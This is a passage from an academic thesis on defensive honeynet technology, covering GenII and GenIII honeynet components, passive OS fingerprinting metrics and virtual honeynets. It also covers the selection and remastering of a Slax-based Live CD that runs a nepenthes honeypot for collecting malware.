Microsoft Windows operating systems. In consequence, Sebek could be completely disabled. As can be seen, even sophisticated logging and monitoring technologies can often be bypassed or actively manipulated by savvy attackers. Again, this highlights the fact that multiple data capture layers are required for collecting extensive information about Internet miscreants (cmp. Honeynet Project, 2004b). On the other hand, GenII honeynets do not specify how this information is to be stored or accessed in a later analysis (see Balas and Viecco, 2005). What is worse, many tools define their own data format without considering relationships to other data capture sources. Due to these incompatibilities, investigations of security-related incidents are made more difficult. Therefore, second generation honeynets have been superseded by more organized and structured architectures. We will have a closer look on these innovations in the following section. 3.3 GenIII Honeynets In 2004, members of the Honeynet Project started the development of a more advanced type of honeynets (cmp. Honeynet Project, 2005d). These so-called GenIII honeynets 30 3 Honeynet Technology are commonly deployed to date and facilitate watching and analyzing malicious activities on the Internet. They implement all the features of preceding technologies, including the transparent network bridging, data control, and data capture capabilities. In comparison to GenII honeynets, they are significantly easier to set up though. With the bootable CD-ROM Roo12 , the entire Honeywall can be automatically installed to hard disk within minutes. At the end of the installation process, security professionals may then launch a graphical user interface in order to configure the individual components. Hence, a fully working honeynet gateway can be deployed within a short amount of time (see also Provos and Holz, 2007, and Chapter 5). In addition, several new applications that are part of the Roo CD greatly support post-incident investigations (cmp. Balas and Viecco, 2005): For example, Argus13 (Audit Record Generation and Usage System) is a monitoring system that processes all traffic in real time. In contrast to IPTables or Snort, it is able to delimit single network flows. A flow is a set of packets that are bi-directionally transferred between two computer systems (cmp. Handelman et al., 1999; Paxson et al., 1998). Each flow is characterized by a start and end time and contains qualitative information such as the destination and source address, as well as quantitative information, e.g., the number of transmitted bytes and packets (see Brownlee et al., 1997; QoSient, 2006). As a result, system probes and penetration attempts can be clearly separated from other, unrelated events in the honeynet and examined in more detail. With the passive fingerprinting utility p0f14 , it is possible to determine the operating system of a remote system. (cmp. Zalewski, 2005). When a connection is initiated with a honeypot, inbound network packets are intercepted on the level of the Honeywall, before they are forwarded to the respective machine. By finding subtle discrepancies in the packet headers, p0f is then capable of creating a unique fingerprint of the host and identifying the system platform in question. For these purposes, the packet metrics as illustrated in Table 3.3 have proven helpful (see also Honeynet Project, 2002b; Stevens, 1994). Compared to other fingerprinting tools such as nmap15 or xprobe16 , these operations are often slightly less accurate, because p0f solely processes captured network data and does not actively interact with the target system (see Zalewski, 2006). On the other hand, due to this characteristic, the utility cannot be detected either and, therefore, perfectly meets the requirements of the Honeynet Project (2004a). Another crucial component in GenIII honeynets is the hflow daemon. It continually interacts with different data capture sources, including Snort, Sebek, Argus, and p0f, to create a unified data set that is independent from application-specific format definitions (see Balas and Viecco, 2005). The information is hierarchically structured and stored in 12 see see 14 see 15 see 16 see 13 https://projects.honeynet.org/honeywall/ http://www.qosient.com/argus/ http://lcamtuf.coredump.cx/p0f.shtml http://insecure.org/nmap/ http://sourceforge.net/projects/xprobe 31 3 Honeynet Technology Metric TTL Value Don’t Fragment Flag IPID Value ToS Value Window Size Urgent Pointer Value Description The value of the Time to Live (TTL) field in the header of a network packet is decreased whenever an intermediary device is passed. Once it reaches zero, it is discarded to prevent infinite loops. Because system vendors use different initial values for the field, an analysis of the TTL value may help reveal the system platform of the host (see also SWITCH, 2002). If the Don’t Fragment (DF) flag is set, a network packet is dropped in case it cannot be forwarded to another device without fragmentation. This flag is not used by older operating systems. The value of the IP Identification (IPID) field uniquely identifies a fragmented packet. In various operating system implementations, this field is always set to zero. With the help of the Type of Service (ToS) field, the preferred routing method can be indicated, e.g., to minimize network delays or maximize reliability. However, on most operating systems, this field is set to a fixed value. The Window Size determines the number of bytes that can be sent without acknowledgement. The value often corresponds to the Maximum Segment Size (MSS) of a packet. The value in the Urgent Pointer field must be set to zero unless the URG flag is set in the header of a network packet. However, in some platform implementations, this field is always initialized with a nonzero value. Table 3.3: Metrics Used by the p0f Passive Fingerprinting Utility (Source: Based on Zalewski, 2005; Stevens, 1994) a relational database. Thus, alerts of the intrusion detection system can, for instance, be correlated with processes and network flows. As a consequence, causal relationships between logical entities can be quickly discovered. Therefore, the approach provides “a more comprehensive representation of events” in contrast to GenII honeynets, as Balas and Viecco (2005, p. 4) argue. For administrative purposes, the data may be remotely accessed over the web-based interface Walleye. Walleye permits generating various summary and status reports about activities within the honeynet (see also Honeynet Project, 2005d). The software also supports exporting selected traffic flows in raw network format. As we will see in Chapter 5, these features enable security professionals to perform offline forensic investigations 32 3 Honeynet Technology with external applications such as Honeysnap17 which is used to efficiently recover attack tools and clear text communications of adversaries. Last but not least, Walleye greatly facilitates maintaining and configuring most parts of the Honeywall. For instance, it is possible to restart stalled processes or completely shut down the gateway to block all incoming and outgoing connections. Hence, administrators can stay in control of their decoys at all times and are able to mitigate risks for the external environment as best as possible. 3.4 Virtual Honeynets and Future Implementations A large honeynet can be complex and expensive to administrate if each honeypot is installed on its own physical machine. An alternative approach is the use of virtualization techniques similar to those described in Chapter 2. As we have explained, these techniques can help keep hardware costs down and make the deployment of a virtual honeynet easier (cmp. Provos and Holz, 2007). Even though a virtual honeynet may be built on a single system, a hybrid solution is more common in practice to date (cmp. Honeynet Project, 2003b). In this case, the individual honeypots are deployed within virtual machines, while the Honeywall is run on a dedicated machine (cmp. Figure 3.9). This architecture has several advantages (see also Honeynet Project, 2004b): First, the implementation is more secure, because the Honeywall is physically isolated from the electronic baits. Thus, even if an attacker successfully compromises a virtual machine, the danger of getting privileged access to the honeynet gateway is comparatively small. Figure 3.9: Example of a Hybrid Virtual Honeynet (Source: Based on Honeynet Project, 2003b) 17 see http://www.honeynet.org/tools/honeysnap/index.html 33 3 Honeynet Technology Figure 3.10: Example of a Distributed Honeynet (Source: Based on Spitzner, 2003c) Second, the Honeywall operates independently from the honeypots. Consequently, its performance level is not reduced if additional decoys are installed, and physical resources must be shared between a higher number of virtual machines. Due to these reasons, we favor the hybrid-based type in the scope of this thesis. A description of the corresponding setup process is subject of Chapter 5. A new variant of honeynets is still in development at the time of this writing. The idea of these so-called distributed honeynets is the observation of adversaries on a large scale, while minimizing costs and maintenance efforts at the same time (cmp. Honeynet Project, 2004b). Although these objectives may appear contradictory at first sight, the concept may be realized with honeypot farms. A honeypot farm is a consolidated network of electronic baits running at a single location (see Spitzner, 2003c). It serves as a central monitoring station for multiple, virtually distributed honeypots: With the help of a socalled virtual private network (VPN), administrators of smaller honeynets transparently redirect their traffic to the honeypot farm. As a result, an attacker is tricked to be interacting with a specific network segment, while in reality, she is targeting machines which are possibly deployed in in a completely different part of the world. An illustration of these operations is shown in Figure 3.10. In comparison to traditional honeynets, the distributed architecture offers several advantages (see Honeynet Project, 2004b; Spitzner, 2003c): On the one hand, security professionals are able to quickly react to new threats, because resources, knowledge, and expertise can be concentrated at the honeypot farm. On the other hand, the level of involvement and risk of participating networks is decreased, because traffic flows solely need to be forwarded. Consequently, these networks are not directly affected by malicious activities. However, it is also important to note that the technology is complex and challenging (cmp. Honeynet Project, 2004b). Because traffic redirection causes network latencies, suspicion may be raised on the side of intruders. In addition, global time synchronization 34 3 Honeynet Technology and data sanitization issues have to be addressed as well. If these problems are properly solved though, a new generation of honeynets is likely to be released. For evaluation purposes, a preliminary version can already be downloaded from the official web page of the project18 . 3.5 Summary This chapter provided an introduction to honeynet technology. A honeynet is a group of honeypots that are set up and interconnected in an isolated, non-productive network segment. In contrast to a single electronic bait, the architecture enables security professionals to observe adversaries on a larger scope and gain extensive information about tools, tactics, and motives of adversaries. However, it is significantly more complex to maintain and control, and potentially poses a severe threat to the external environment. In order to minimize risks for uninvolved third parties as best as possible, we have presented three central standards that must be carefully taken into consideration in the deployment phase of a honeynet: First, data control mechanisms must ensure malicious activities are safely contained within the honeynet. Second, data capture facilities need to record suspicious traffic without raising the attention of attackers. Third and last, data analysis technologies must facilitate network forensic and post-incident investigations. As we have pointed out, the technical implementation of these standards has changed over time and varies in different honeynet generations: GenI honeynets are only interesting for historical purposes. They solely provide rudimentary data control and data capture functions and are comparatively easy to detect. GenII honeynets can greatly mitigate these disadvantages by deploying a transparent bridge, the so-called Honeywall, that is capable of stealthily intercepting inbound and outbound network connections. Moreover, the device includes several data control as well as data capture layers: With the help of the IPTables packet filtering software and the Snort Inline intrusion prevention system, it is possible to block or disable malicious packets going out of the honeynet. Furthermore, the rule-based intrusion detection system Snort is able to record traffic flows and identify penetration attempts at the network perimeter. Last but not least, the monitoring utility Sebek permits capturing both the keystrokes and attack tools of adversaries. It is directly installed on a decoy and regularly sends logged information over a covert channel to the honeynet gateway. One downside of GenII implementations are their heterogenous data sources and data formats. Due to subtle incompatibilities between the different components, investigations of security-related incidents are complex and time-consuming. These issues are addressed in GenIII honeynets by uploading the collected data to a central database. The database can be comfortably accessed with the web interface Walleye. In comparison to preceding technologies, GenIII honeynets are also easier to set up and administrate. With the bootable CD-ROM Roo, the Honeywall can be automatically 18 see http://distributed.honeynets.org/ 35 3 Honeynet Technology installed within minutes. In many cases, administrators use a dedicated machine for these purposes, while they run the individual honeypots within virtual machines. This hybrid approach permits keeping hardware costs down and reducing maintenance efforts. We have also briefly described the fundamentals of distributed honeynets, an advanced type of honeynets that is still in development at the time of this writing. By redirecting traffic from smaller networks to a honeypot farm, it is hoped intruders can be watched on a large scale. In spite of these premises, the architecture has to cope with various challenges such as latency and time synchronization problems. For this reason, it must be thoroughly evaluated, before a new generation of honeynets can be released. The concepts outlined in the previous sections serve as a theoretical foundation for our own honeynet implementation that is illustrated in detail in Chapter 5. In addition, we present a so-called Live CD that makes the deployment phase of electronic baits easier and helps security professionals collect autonomously spreading worms, viruses, and other types of self propagating malware. The innovation process of this device is subject of the following chapter. 36 4 Development of a Live CD-Based Honeypot Deploying a larger number of honeypots can be complex and laborious (cmp. Mokube and Adams, 2007; Sadasivam et al., 2005). Operating systems as well as specific vulnerable services need to be installed, and monitoring devices must be adequately tuned. However, many actions have to be repeated multiple times during the configuration process, e.g., setting network parameters or creating user accounts. These administrative tasks are time-consuming but do not lead to a significant increase in knowledge and expertise in the long term. With the help of a so-called Live CD, deployment and initialization of electronic decoys can be automated to a great extent, thus, facilitating the work of security professionals and permitting them to focus on computer crime-related incidents. A Live CD comprises a complete operating system as well as a number of selected applications and “is typically designed to boot and run entirely from a read-only medium” (Negus, 2007, p. 7). At runtime, data is copied to and solely modified in volatile memory. When the system is shutdown or rebooted, all changes are reset. These characteristics make Live CDs perfectly suited for honeypot-based research, as a decoy can be quickly put back online after a compromise without major modifications. In the course of this thesis, we develop our own derivative of such a CD. End-users are able to boot our disk and start a pre-configured, fully working low-interaction honeypot with a simple click. Thereby, it is possible to deploy numerous electronic baits and collect data on a large scale within a short amount of time. With respect to the development process, it is important to note that we do not have to create our system from scratch. At the time of this writing, more than 300 different Live CDs are already available (see Brand, 2007). For this reason, we may use an existing distribution and remaster it according to our requirements, i.e., we substantially change the base of the system and adapt existing features to our needs. In order to choose an appropriate candidate, an evaluation of each CD would be out of the scope though. We are not aware of any scientific work on the relative performance of Live CDs either. Therefore, we only assess the most popular versions as listed by Jordan (2006) and select the most promising distribution as a starting point for our remastering project. 37 4 Development of a Live CD-Based Honeypot Outline of the Chapter This chapter is outlined as follows: In the upcoming section, we give a short overview about the most prevalent Live CDs. We assess the different distributions according to a set of pre-defined decision attributes and select the candidate that best matches our requirements. The corresponding evaluation and selection model is subject of Section 4.2. A description of the development and remastering process of our own Live CD is presented in the third section of this chapter. With the help of a preliminary but fully-working prototype, we are able to capture autonomously spreading malware on a large scale and analyze threats that are commonly found on the Internet at the time of this writing. A summary of the results of our research is given in Section 4.3.4. 4.1 Overview about Popular Live CD Distributions According to Jordan (2006), the top Live CD distributions are Knoppix, Kanotix, SimplyMEPIS, PCLinuxOS, Slax, and Ubuntu. We briefly illustrate the major characteristics and features of these CDs in the following. • Knoppix: Knoppix1 is a popular free Live CD developed by Klaus Knopper and is regarded as “the most mature and widely used bootable Linux CD” (Negus, 2007, p. 24). Software packages include a complete desktop environment with office, Internet, and multimedia applications. Hardware support and compatibility are excellent (cmp. FrozenTech, 2004b). Due to its extensive modification possibilities (FrozenTech, 2005a) and a vivid community, a lot of other distributions are derived from Knoppix, e.g., the modularbased version Morphix2 or Knoppix-STD3 , a Live CD that provides a vast collection of security tools and addresses the needs of system administrators as well as penetration testers. • Kanotix: Kanotix4 is a Debian-based Live CD and free of charge. It is especially known for its outstanding hardware support (see FrozenTech, 2004b) and contains a lot of additional software packages. Remastering Kanotix is possible but quite difficult, because only a small amount of official documentation does exist. • SimplyMEPIS: In contrast to many other Linux distributions, SimplyMEPIS5 is a commercial Live CD developed by Warren Woodford. The latest version is based on Ubuntu (see below). 1 see see 3 see 4 see 5 see 2 http://www.knoppix.org/ http://www.morphix.org/ http://s-t-d.org/ http://kanotix.com/ http://www.mepis.org/ 38 4 Development of a Live CD-Based Honeypot One of the exceptional features of SimplyMEPIS is its ability to be used not only as a Live CD, but as an entire operating system installed to hard disk. It is primarily designed for everyday computing but may be remastered with some effort. Official guides and manuals facilitate these activities. • PCLinuxOS: PCLinuxOS6 is a free Live CD for private end-users and is one of the few distributions derived from Mandrake. Its hardware support is very good. As Jordan (2006) states, “compared to Knoppix, MEPIS and Kanotix, there are fewer applications” though. Adapting the CD is comparatively easy due to a number of scripts that permit quick modifications of the whole system. • Slax: Slax7 is a well-known distribution (cmp. FrozenTech, 2004a) and is based on Slackware as the name suggests. It is free of charge and is primarily used for private purposes. Because of its small size, the distribution may be copied to a USB flash drive. Similar to Knoppix, its hardware support is excellent. One of Slax’s unique features is its modular design: Modules contain one or more specific software applications and may be added or removed without affecting other parts of the system. This makes remastering the Live CD extremely easy. In case developers still require help, they are supported by a growing community and several step-by-step guides. • Ubuntu: Ubuntu8 is a free, desktop- and multimedia-oriented Debian derivative by Mark Shuttleworth. At the time of this writing, it heads the list of the most popular Linux distributions (see DistroWatch, 2007). Presumably, this position may also be attributed to its outstanding usability (cmp. FrozenTech, 2005b). Similar to SimplyMEPIS, Ubuntu may function both as a Live CD as well as an operating system copied to hard disk. Remastering activities require an indepth knowledge of the underlying system, even though the individual segments are extensively documented. The main characteristics of each distribution are summarized in Table 4.1. These Live CDs are assessed and evaluated upon our own selection model which is presented in the next section. 6 see http://www.pclinuxos.com/ see http://www.slax.org/ 8 see http://www.ubuntu.com/ 7 39 4 Development of a Live CD-Based Honeypot Distribution Knoppix Kanotix SimplyMEPIS PCLinuxOS Slax Ubuntu Assessed Version 5.11 2007-RC6 6.5 2007 6-RC6 7.10 Size 700 MB 701 MB 693 MB 299-685 MB 41-202 MB 697 MB Based on Debian Debian Ubuntu Mandriva Slackware Debian Kernel Version 2.6.19 2.6.22 2.6.15 2.6.18.8 2.6.21.5 2.6.22 Table 4.1: Main Characteristics of Live CD Distributions (Source Brand, 2007; Wikipedia, 2007) 4.2 Selection Model for the Live CD Distributions To come to a rational decision and choose an adequate candidate for our own distribution, we go through a sequential selection process as indicated in Figure 4.1: First, we identify several influencing factors that greatly affect the development and later use of our CD. We refer to those factors as attributes in the following. However, we do not consider all attributes as equal. Therefore, we use weights to express their relative importance. Finally, we apply a well-known scoring model on all distributions to make a recommendation. Figure 4.1: Selection Process for the Live CD Distributions 40 4 Development of a Live CD-Based Honeypot 4.2.1 Overview about the Decision Attributes Attributes “provide a means of evaluating goal accomplishments” (Yoon and Hwang, 1995, p. 8). Concerning our decision problem, we identify five different attributes, legal restrictions and licensing, hardware compatibility, usability, ease of adaptability, and documentation and official support, as crucial. A short description of each attribute is presented below. • Legal restrictions and licensing: The release version of our Live CD will be freely distributed over the Internet for research purposes and as open source, i.e., the entire source code will be available for future modifications by third parties (cmp. Perens, 1998). For this reason, the base distribution must be published under the GNU General Public License (GNU GPL, see Free Software Foundation, 2007) or a similar licence that permits legal copying and adaptation without any charges. • Hardware compatibility: The CD is supposed to run quickly after startup on different types of computer systems. Therefore, the base system needs to support common hardware devices, especially network interface cards and display adapters. Ideally, these devices are properly configured after booting without any significant manual intervention. For example, network parameters and IP address information are to be automatically set if the system is connected to a server with DHCP (Dynamic Host Configuration Protocol) support. • Usability: Even though the CD is expected to be used mostly by network administrators and security professionals with a strong computer background, its design needs to be as intuitive and as easy as possible, i.e., the honeypot should be started in a user-friendly, graphical environment. Furthermore, common administrative tasks, e.g., changing the password of the superuser, should be carried out quickly to permit focusing on data collection- and analysis-related activities. • Ease of adaptability: The CD must be easily adaptable, i.e., the basis of the distribution needs to extendable and must provide sophisticated package management tools to permit installation, modification, and removal of software applications. • Documentation and official support: Remastering a Live CD is a complex task and requires a thorough understanding of the underlying operating system. Stepby-step guides, collaborative platforms such as forums, and officially supported manuals can strongly facilitate this process and are therefore regarded as a plus. As we have already mentioned, these attributes are not equally important to us. For this reason, we apply a basic weighting technique that is outlined in the next section. 41 4 Development of a Live CD-Based Honeypot 4.2.2 Calculation of the Decision Weights With the help of weights, we are able to indicate the relative importance and prioritization of the individual attributes in a quantitative way. According to Yoon and Hwang (1995, p. 11), one possibility to assess those weights is “to arrange the attributes in a simple rank order, listing the most important attribute first and the least important attribute last”. Then, for n attributes, we simply apply the following formula to calculate the weight wj for the jth attribute and rank rj (see Stillwell et al., 1981): wj = n − rj + 1 (4.1) n X (n − rk + 1) k=1 With regard to our evaluation, we assign the following ranks to the different attributes: Legal restrictions and licence fees have the greatest impact on the development and future distribution of our CD. For this reason, we rank this attribute as most important. Depending on the ease of adaptability as well as the amount of documentation and official support, remastering the base system can be significantly facilitated or made more difficult. Thus, these attributes are ranked second and third. Finally, hardware compatibility and usability are considered least important, because they have minor effects on the development process. A summary of the attribute ranks and their corresponding calculated weights is given in Table 4.2. Attribute Legal restrictions and licensing Hardware compatibility Usability Ease of adaptability Documentation and Official support Attribute Rank 1 4 5 2 3 Attribute Weight 0.33 0.13 0.07 0.27 0.2 Table 4.2: Attribute Ranks and Weights for the Candidate CDs 4.2.3 Overview about the Scoring Model Considering our five candidate CDs and the different evaluation criteria, we have a classic Multiple Attribute Decision Making (MADM) problem, i.e., we need to make a preference decision over a number of given alternatives that are characterized by multiple attributes (cmp. Yoon and Hwang, 1995). Several approaches are recommended in the literature to solve such as problem (see also Yoon and Hwang, 1981): For instance, the Simple Additive Weighting (SAW) technique is a well-known scoring model which is both robust and easy to apply (cmp. Rowe and Pierce, 1982). With the SAW technique, we 42 4 Development of a Live CD-Based Honeypot Figure 4.2: Example of an Ordinal Rating Scale can compute a weighted sum for each Live CD, favoring the alternative with the highest result. Mathematically, the weighted sum for an alternative Ai can be expressed as a value function V (Ai ) as shown in Formula 4.2, where rij is the jth attribute value of the ith alternative, and wj refers to the corresponding attribute weight. V (Ai ) = n X wj · rij i = 1, . . . ,m (4.2) j=1 Attribute values are derived from a five-point ordinal scale that measures the relative performance of an alternative in comparison to other candidates for a given attribute. A value of 1 indicates relatively very bad performance, while a value of 5 reflects relatively very high performance. If an alternative is relatively comparable to others, we assign a neutral value of 3. This process is illustrated in Figure 4.2. We can now calculate the attribute values for all alternatives and apply the SAW scoring model in order to choose an adequate candidate for our own Live CD. These operations are subject of the next section. 4.2.4 Selection of an Adequate Candidate CD We use the ordinal five-point scale as outlined in the previous section to assign attribute values to the different alternatives. The ratings are based upon our own evaluation and surveys by FrozenTech (2004b,a, 2005a,b). The final results are shown in Table 4.3. Concerning the attribute legal restrictions and licensing, all alternatives are assigned the neutral value 3, because they are freely available over the Internet, except from SimplyMEPIS which is distributed under a commercial licence. That is why, this Live CD is depreciated in comparison to all other candidates. Kanotix has a superior hardware compatibility and is therefore assigned with the highest attribute value. Knoppix, Slax, and PCLinuxOS have a slightly better hardware support in comparison to SimplyMEPIS and Ubuntu. The usability of most candidate distributions is outstanding, only PCLinuxOS performs below average because of its limited amount of applications. Slax is easiest to adapt due to its modular design, closely followed by PCLinuxOS. SimplyMEPIS and Ubuntu are relatively difficult to remaster since they require a more thorough under- 43 4 Development of a Live CD-Based Honeypot Distribution Knoppix Kanotix SimplyMEPIS PCLinuxOS Slax Ubuntu Legal Restrictions and Licensing Hardware Compatibility Usability Ease of Adaptability 3 3 4 5 4 4 3 3 Documentation and Official Support 5 1 1 3 3 2 3 3 4 2 4 4 3 3 4 3 4 5 5 2 3 4 Table 4.3: Attribute Values for the Candidate CDs standing of the base system. Finally, Knoppix is leading regarding documentation and official support. Many guides, manuals, and collaborative platforms facilitate modifications of the CD, similar to PCLinuxOS and Ubuntu. In contrast, Kanotix is extremely badly documented and, hence, is assigned with an attribute value of 1. As we have already explained, these attribute values are multiplied with the corresponding attribute weights to compute the weighted sum for each alternative in accordance to Formula 4.2. As can be seen in Table 4.4, Slax is considered to be the best choice for our own Live CD with a weighted sum of 3.7. Good alternative candidates are Knoppix and PCLinuxOS as well. The results are not very surprising as the distributions are well-engineered, while being easy to use and adapt at the same time. Kanotix is rated slightly below average due to its lack of official documentation. In comparison to leading Live CDs, Ubuntu does not have any significant advantages, except from its usability. SimplyMEPIS is, on the whole, regarded as a rather unsatisfactory solution, mainly because of its commercial licence. To test the robustness of our decision, we perform a sensitivity analysis, i.e., we change the significance of different attributes, repeat the computation step, and compare the newly generated weighted sums with the original values. In consequence, we consider the attribute ease of adaptability as the most important decision criterion, followed by hardware compatibility, and legal restrictions and licensing. Documentation and official support and usability are ranked 4th and 5th. The results of the sensitivity analysis are listed in Table 4.5. As can be seen, Slax is still the leading alternative, while PCLinuxOS is now preferred upon Knoppix. Kanotix performs slightly better than Ubuntu. The rating of SimplyMEPIS remains stable. 44 4 Development of a Live CD-Based Honeypot Distribution Knoppix Kanotix SimplyMEPIS PCLinuxOS Slax Ubuntu Documentation P and Official Support 1 3.6 0.2 2.9 Legal Restrictions and Licensing Hardware Compatibility Usability Ease of Adaptability 1 1 0.53 0.67 0.27 0.27 0.8 0.8 0.33 0.4 0.2 0.53 0.6 2.1 1 0.53 0.13 1.07 0.8 3.5 1 1 0.53 0.4 0.27 0.33 1.33 0.53 0.6 0.8 3.7 3.1 Table 4.4: Attribute Ratings and Weighted Sums for the Live CDs Distribution Knoppix Kanotix SimplyMEPIS PCLinuxOS Slax Ubuntu Documentation P and official Support 0.67 3.6 0.13 3.3 Legal Restrictions and Licensing Hardware Compatibility Usability Ease of Adaptability 0.6 0.6 1.07 1.33 0.27 0.27 1 1 0.2 0.8 0.2 0.67 0.4 2.3 0.6 1.07 0.13 1.33 0.53 3.7 0.6 0.6 1.07 0.8 0.27 0.33 1.67 0.67 0.4 0.53 4.0 2.9 Table 4.5: Weighted Sums for the Live CDs after the Sensitivity Analysis 45 4 Development of a Live CD-Based Honeypot 4.2.5 Summary of the Methodology To select an adequate distribution as a basis for our own Live CD, we have assessed six potential candidates upon a list of multiple attributes, namely legal restrictions and licensing, hardware compatibility, usability, ease of adaptibility, and documentation and official support. Since not all attributes were equally important to us, we have applied weights to indicate their relative significance. These weights were used as input parameters to the Simple Additive Weighting model. The model computes a total evaluation score for each alternative, the so-called weighted sum. Under consideration of the given attributes, the alternative with the highest weighted sum is favored, in our case, the Slackware-based distribution Slax. We were able to verify this result by performing a sensitivity analysis. However, it needs to be emphasized that parts of our assessment still remain subjective, e.g., when assigning weights or attribute values. Thus, other distributions may likely be utilized to create a Live CD-based honeypot as well. For example, the CD developed by the SurfIDS project (see Chapter 2) is built upon Knoppix. Hence, our choice is eventually also a matter of personal preference. The following explanations refer to the modification and customization of the Slax Live CD. 4.3 Development and Remastering Process of the Live CD As we have outlined in the previous section, we use Slax as a foundation for our own Live CD-based honeypot. However, a good understanding of the base architecture is required in order to successfully remaster the CD and adapt it to our needs. For this reason, we give a brief overview about the technical implementation of the distribution before explaining the development process in detail. 4.3.1 Technical Architecture of Slax 4.3.1.1 Boot Sequence Similar to other Live CDs, Slax is compliant with the so-called El Torito standard, a format specification that describes how to make a CD bootable (see Stevens and Merkin, 1995). Thus, when the computer is powered on, the system BIOS is able to invoke a boot loader on the CD. The boot loader presents a list of valid boot images to the user and determines the parameters and additional options the operating system is started with. When such an image is launched, control is passed to the Linux kernel, and an initial ram disk is mounted into memory. This disk serves as a root file system and contains a small number of applications which are needed for further initialization tasks. Most importantly, the special script linuxrc gets executed. Linuxrc is responsible for 46 4 Development of a Live CD-Based Honeypot Figure 4.3: Boot Sequence of the Slax Live CD loading essential hardware drivers and creating a temporary live file system to permit later access to programs and files. Finally, the first process of the operating system, init, is run which serves as a parent for all other services and daemons. Depending on a run level, init makes different sets of programs and applications available, by default, a graphical desktop manager with multiuser support. A summary illustration of the boot sequence is given in Figure 4.3. We will have a closer look on the individual phases in a later section (see also Negus, 2007; Jones, 2006a). First of all, however, we describe the file storage and file maintenance mechanisms used by the distribution. 4.3.1.2 File Systems Slax relies on two special file systems in order to store and manage files efficiently. • SquashFS: The SquashFS9 file system is used to compress files and entire directory structures. Thereby, it is possible to keep the size of the distribution moderately small while providing a decent number of applications. By applying a high-performance compression algorithm such as Lempel-Ziv-Markov (LZM), the compression ratio can be even increased (see also Lougher and Okajima, 2008). However, one major disadvantage of SquashFS is that is solely capable of saving data in read-only mode. Therefore, operations which require write permissions must be executed on a second, flanking file system. 9 see http://squashfs.sourceforge.net/ 47 4 Development of a Live CD-Based Honeypot • Aufs: Due to the limitations of SquashFS and the physical characteristics of CDROMs, content is always only accessible in read-only mode. During a user session, system settings need to be frequently altered and updated though. To circumvent these restrictions, files must be temporarily shifted into writable sections of volatile memory. In theory, multiple possibilities do exist to realize this operation. For instance, it is possible to copy the entire root directory tree completely into RAM in order to make the full disk available. However, this approach is not satisfactory, because large portions of space are consumed. Another option is to restrict modifications to certain parts of the system, for example, the home directory of a user. This solution is not convincing either because it makes reconfigurations and new installations significantly more difficult. To overcome the said obstacles, Live CDs frequently implement so-called union file systems. These types of file systems are able to merge read-only systems such as SquashFS with a special directory in memory which possesses full access permissions (cmp. Wright et al., 2004). The result of those joined directories is called a union. When a file needs to be changed, it is transparently transferred from the read-only section to the writable branch of the union. This process is known as a copyup. Thereby, while the file may be temporarily modified in memory, its original physical instance is never touched. Consequently, the union acts as a virtual overlay for the underlying disk structure of the CD (cmp. Figure 4.4). Several software applications support the creation of union file systems. Slax uses aufs (Another Union File System)10 which is maintained by Junjiro Okajima. It has considerable advantages concerning the performance and stability over Unionfs, a comparable solution which is more popular11 . 10 11 see http://aufs.sourceforge.net/ see http://www.am-utils.org/project-unionfs.html and the discussion on the mailing list of the Stony Brook University, http://www.fsl.cs.sunysb.edu/ 48 4 Development of a Live CD-Based Honeypot Figure 4.4: Illustration of the Union File System 4.3.1.3 File System Modules In order to store programs and other software components on the CD, Slax uses a number of file system modules. Each module saves a specific directory tree in compressed format. When the system boots up, the modules are uncompressed and mounted into a temporary union to create a global unified file system. As we have described in the previous section, this operation is completely transparent to the end user. A major advantage of the modular-oriented approach is that remastering the operating system is much more comfortable compared to other distributions. For instance, to remove a set of applications with a certain behavior, it is sufficient to delete the corresponding module. This process does not affect the functionality of other software artifacts. In turn, Slax can be easily extended by developing new modules which are automatically integrated by the system at startup. In fact, a huge collection of different modules for various purposes is already available for download12 . 12 see http://www.slax.org/modules.php 49 4 Development of a Live CD-Based Honeypot By default, Slax defines nine base modules with numerous software packages. A software package provides a pre-configured, fully working application. A description of all software packages can be found on the accompanying CD-ROM of this thesis, a short overview about the base modules is given in Table 4.6. As we have already indicated, the concepts outlined above need to be thoroughly understood before starting to adapt the distribution. Furthermore, because changes may greatly affect system stability and performance, we recommend to plan and document all modifications in advance. The project specifications for our Live CD are presented in the following. The description of the remastering process is subject of Section 4.3.3. Module 001-core 002-apps 003-network 004-xorg 005-xapdeps 006-kde 007-kdeapps 008-office 009-devel Description Base system with essential hardware drivers, libraries, and console applications for administrative purposes Extends the core module and provides a collection of popular services and applications, e.g., the Common Unix Printing System (CUPS), the Gnu Awk (GAWK) text processor, and the OpenSSL libraries to support cryptographic functions Collection of network-related daemons and applications, for example, the bind DNS server, a basic Internet browser, multiple network monitoring tools, and utilities for remote connection Libraries for the graphical desktop environment Extends the xorg module and stores additional libraries for the graphical desktop environment Provides the K Desktop Environment (KDE), a graphical user interface, and basic multimedia applications Extends the KDE session manager with various multimedia applications such as K3b, a CD recording utility Basic office and text processing applications Stores multiple applications for software development, including the Gnu Compiler Collection (GCC) and the Linux kernel headers Table 4.6: Base Modules Included in the Slax Live CD 4.3.2 Project Specifications for the Live CD The central component of our Live CD is formed by a pre-configured honeypot. More precisely, we favor a low-interaction variant, mainly because of two reasons: First, a low-interaction honeypot imposes a comparatively smaller level of complexity on the system administrator. Thus, it can be quickly set up and is easy to maintain as we have explained in Chapter 2. Second, one of the primary objectives of this project is 50 4 Development of a Live CD-Based Honeypot to support the deployment of honeynets with numerous electronic baits within a short amount of time in order to collect data about malicious activities on a large scale. For a standardized high-interaction environment, attackers would likely be able to develop fingerprints of the systems sooner or later and circumvent the decoys in the future (cmp. Honeynet Project, 2004b). This would render the CD ineffective. That is why highinteraction honeypots are not applicable in our case. To integrate the honeypot with our Live CD, we develop a separate file system module which is automatically loaded when the operating system is started. The module contains the core honeypot files, its system dependencies, and various scripts for configuration and administrative purposes. Concerning the low-interaction honeypot, we choose to implement nepenthes that we have already introduced in a previous chapter of this thesis. Nepenthes runs stable and can be set up without problems. Additionally, its hardware requirements are moderate. It consumes only small amounts of memory and is highly scalable (cmp. Bächer et al., 2006). These characteristics make nepenthes well-suited for our needs. To guarantee the integrity and safety of the CD, we execute the honeypot within a secured environment, a so-called jail, which makes it difficult to break out of. Even if adversaries succeed in compromising the decoy, their access is restricted to certain files and directories, but they cannot modify substantial parts of the disk. Another challenge that we must cope with is the volatile environment of the Live CD: When the system crashes or is accidentally rebooted, all results of our research are lost, because data is solely stored in memory. We can solve this problem by sending captured malware as well as information about threats and intrusions to a central server on the Internet. The server is responsible for creating backups of our files and generating reports about the behavior of the malicious software coming in. Thereby, security professionals ideally need to analyze the status of only this machine on a regular basis. On the contrary, once started, the Live CD-based honeypot is supposed to collect 